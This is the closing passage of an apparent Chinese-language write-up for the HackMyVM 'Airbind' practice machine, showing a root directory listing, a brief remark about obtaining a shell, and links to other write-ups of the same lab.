-rw-r--r-- 1 root root 161 9 juil. 2019 .profile
-rwx------ 1 root root 33 2 avril 2024 root.txt
drwx------ 2 root root 4096 2 avril 2024 .ssh
同样拿到了shell,帅的一批!
参考
https://youtu.be/OffNnj5RQJQ?si=Gzh4kVJqmL0GT0FZ
https://github.com/HosseinVampire/Writeups/blob/main/Hackmyvm/Machines/Airbind/Ctf.md
https://vishal-chandak.medium.com/hackmyvm-airbind-2d776bc55fe1